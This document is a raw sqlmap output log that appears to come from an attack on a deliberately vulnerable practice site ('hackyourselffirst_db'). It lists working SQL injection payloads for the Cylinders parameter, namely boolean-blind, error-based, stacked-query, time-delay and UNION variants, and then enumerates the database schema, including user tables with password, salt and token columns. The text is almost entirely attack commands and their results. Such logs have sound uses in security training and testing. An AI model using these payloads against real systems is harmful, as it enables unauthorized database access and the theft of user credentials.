sqlmap identified the following injection point(s) with a total of 45 HTTP(s) requests:
---
Parameter: Cylinders (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Cylinders=V8' AND 3245=3245 AND 'lHyI'='lHyI

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: Cylinders=V8' AND 6164 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6164=6164) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(118)+CHAR(113))) AND 'wvaX'='wvaX

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Cylinders=V8';WAITFOR DELAY '0:0:5'--

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
    Payload: Cylinders=V8' WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: Cylinders=V8' UNION ALL SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(73)+CHAR(114)+CHAR(105)+CHAR(83)+CHAR(109)+CHAR(108)+CHAR(111)+CHAR(90)+CHAR(80)+CHAR(102)+CHAR(112)+CHAR(90)+CHAR(84)+CHAR(118)+CHAR(99)+CHAR(84)+CHAR(99)+CHAR(112)+CHAR(88)+CHAR(108)+CHAR(78)+CHAR(109)+CHAR(112)+CHAR(72)+CHAR(66)+CHAR(83)+CHAR(118)+CHAR(105)+CHAR(67)+CHAR(109)+CHAR(82)+CHAR(108)+CHAR(118)+CHAR(119)+CHAR(106)+CHAR(81)+CHAR(109)+CHAR(99)+CHAR(111)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(118)+CHAR(113),NULL-- ZZPn
---
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS operating system: Windows
back-end DBMS: Microsoft SQL Server Azure
banner:
---
Microsoft SQL Azure (RTM) - 12.0.2000.8
    May 12 2022 23:11:24
    Copyright (C) 2022 Microsoft Corporation
---
current user: 'HackYourselfFirstRestricted'
current database: 'hackyourselffirst_db'
current user is DBA: False

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Cylinders (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Cylinders=V8' AND 3245=3245 AND 'lHyI'='lHyI

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: Cylinders=V8' AND 6164 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6164=6164) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(118)+CHAR(113))) AND 'wvaX'='wvaX

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Cylinders=V8';WAITFOR DELAY '0:0:5'--

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
    Payload: Cylinders=V8' WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: Cylinders=V8' UNION ALL SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(73)+CHAR(114)+CHAR(105)+CHAR(83)+CHAR(109)+CHAR(108)+CHAR(111)+CHAR(90)+CHAR(80)+CHAR(102)+CHAR(112)+CHAR(90)+CHAR(84)+CHAR(118)+CHAR(99)+CHAR(84)+CHAR(99)+CHAR(112)+CHAR(88)+CHAR(108)+CHAR(78)+CHAR(109)+CHAR(112)+CHAR(72)+CHAR(66)+CHAR(83)+CHAR(118)+CHAR(105)+CHAR(67)+CHAR(109)+CHAR(82)+CHAR(108)+CHAR(118)+CHAR(119)+CHAR(106)+CHAR(81)+CHAR(109)+CHAR(99)+CHAR(111)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(118)+CHAR(113),NULL-- ZZPn
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 4.0.30319
back-end DBMS: Microsoft SQL Server azure

Database: tempdb
Table: #dm_hadr_database_replica_states____________________________________________________________________________________0000000024CA
[38 columns]
+-----------------------------+------------------+
| Column                      | Type             |
+-----------------------------+------------------+
| database_id                 | int              |
| database_state_desc         | nvarchar         |
| end_of_log_lsn              | varchar          |
| filestream_send_rate        | bigint           |
| group_database_id           | uniqueidentifier |
| group_id                    | uniqueidentifier |
| internal_state_desc         | nvarchar         |
| is_commit_participant       | bit              |
| is_forwarder                | int              |
| is_local                    | bit              |
| is_primary_replica          | bit              |
| is_seeding_in_progress      | int              |
| is_suspended                | bit              |
| last_commit_lsn             | varchar          |
| last_commit_time            | datetime         |
| last_hardened_lsn           | varchar          |
| last_hardened_time          | datetime         |
| last_received_lsn           | varchar          |
| last_received_time          | datetime         |
| last_redone_lsn             | varchar          |
| last_redone_time            | datetime         |
| last_sent_lsn               | varchar          |
| last_sent_time              | datetime         |
| log_send_queue_size         | bigint           |
| log_send_rate               | bigint           |
| logical_database_name       | nvarchar         |
| low_water_mark_for_ghosts   | bigint           |
| quorum_commit_lsn           | varchar          |
| quorum_commit_time          | datetime         |
| recovery_lsn                | varchar          |
| redo_queue_size             | bigint           |
| redo_rate                   | bigint           |
| replica_id                  | uniqueidentifier |
| secondary_lag_seconds       | bigint           |
| suspend_reason_desc         | nvarchar         |
| synchronization_health_desc | nvarchar         |
| synchronization_state_desc  | nvarchar         |
| truncation_lsn              | varchar          |
+-----------------------------+------------------+

Database: hackyourselffirst_db
Table: Make
[2 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| MakeId | int      |
| Name   | nvarchar |
+--------+----------+

Database: hackyourselffirst_db
Table: Supercar
[12 columns]
+--------------------------+----------+
| Column                   | Type     |
+--------------------------+----------+
| Cylinders                | nvarchar |
| Description              | nvarchar |
| EngineCc                 | int      |
| EngineLayout             | nvarchar |
| MakeId                   | int      |
| Model                    | nvarchar |
| PowerKw                  | int      |
| SupercarId               | int      |
| TopSpeedKm               | int      |
| TorqueNm                 | int      |
| WeightKg                 | int      |
| ZeroToOneHundredKmInSecs | float    |
+--------------------------+----------+

Database: hackyourselffirst_db
Table: UserProfile
[6 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| Email     | nvarchar |
| FirstName | nvarchar |
| IsAdmin   | bit      |
| LastName  | nvarchar |
| Password  | nvarchar |
| UserId    | int      |
+-----------+----------+

Database: hackyourselffirst_db
Table: Vote
[4 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| Comments   | nvarchar |
| SupercarId | int      |
| UserId     | int      |
| VoteId     | int      |
+------------+----------+

Database: hackyourselffirst_db
Table: webpages_Membership
[11 columns]
+-----------------------------------------+----------+
| Column                                  | Type     |
+-----------------------------------------+----------+
| ConfirmationToken                       | nvarchar |
| CreateDate                              | datetime |
| IsConfirmed                             | bit      |
| LastPasswordFailureDate                 | datetime |
| Password                                | nvarchar |
| PasswordChangedDate                     | datetime |
| PasswordFailuresSinceLastSuccess        | int      |
| PasswordSalt                            | nvarchar |
| PasswordVerificationToken               | nvarchar |
| PasswordVerificationTokenExpirationDate | datetime |
| UserId                                  | int      |
+-----------------------------------------+----------+

Database: hackyourselffirst_db
Table: webpages_OAuthMembership
[3 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| Provider       | nvarchar |
| ProviderUserId | nvarchar |
| UserId         | int      |
+----------------+----------+

Database: hackyourselffirst_db
Table: webpages_Roles
[2 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| RoleId   | int      |
| RoleName | nvarchar |
+----------+----------+

Database: hackyourselffirst_db
Table: webpages_UsersInRoles
[2 columns]
+--------+------+
| Column | Type |
+--------+------+
| RoleId | int  |
| UserId | int  |
+--------+------+

Database: hackyourselffirst_db
Table: sys.database_firewall_rules
[6 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| create_date      | datetime |
| end_ip_address   | varchar  |
| id               | int      |
| modify_date      | datetime |
| name             | nvarchar |
| start_ip_address | varchar  |
+------------------+----------+

Database: hackyourselffirst_db
Table: sys.script_deployment_status
[9 columns]
+------------------+------------------+
| Column           | Type             |
+------------------+------------------+
| database_name    | nvarchar         |
| deployment_end   | datetimeoffset   |
| deployment_id    | uniqueidentifier |
| deployment_start | datetimeoffset   |
| logical_server   | nvarchar         |
| messages         | nvarchar         |
| num_retries      | smallint         |
| status           | nvarchar         |
| worker_id        | uniqueidentifier |
+------------------+------------------+

Database: hackyourselffirst_db
Table: sys.script_deployments
[11 columns]
+----------------------+------------------+
| Column               | Type             |
+----------------------+------------------+
| coordinator_id       | uniqueidentifier |
| deployment_end       | datetimeoffset   |
| deployment_id        | uniqueidentifier |
| deployment_name      | nvarchar         |
| deployment_start     | datetimeoffset   |
| deployment_submitted | datetimeoffset   |
| messages             | nvarchar         |
| results_table        | nvarchar         |
| retry_policy         | nvarchar         |
| script               | nvarchar         |
| status               | nvarchar         |
+----------------------+------------------+